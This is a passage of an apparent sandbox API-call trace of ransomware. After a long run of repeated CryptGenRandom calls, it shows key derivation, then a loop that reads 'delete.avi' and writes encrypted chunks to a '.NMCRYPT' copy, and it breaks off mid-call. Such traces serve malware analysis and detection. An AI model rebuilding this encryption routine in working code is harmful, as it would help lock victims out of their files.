pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.665] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.666] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.667] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.668] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.669] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0149.669] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0149.669] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0149.669] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0149.670] CryptHashData (hHash=0x9ad7b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0149.670] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad7b8, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad478) returned 1 [0149.670] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0149.670] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0149.670] wcslen (_String="\\\\?\\") returned 0x4 [0149.670] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad678) returned 1 [0149.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0149.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0149.670] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=208408) returned 1 [0149.670] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0149.671] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0150.230] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0150.230] GetLastError () returned 0x0 [0150.230] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.268] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.269] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.269] GetLastError () returned 0x0 [0151.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.269] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.269] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.269] GetLastError () returned 0x0 [0151.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.269] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.269] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.269] GetLastError () returned 0x0 [0151.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.269] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.269] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.269] GetLastError () returned 0x0 [0151.269] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 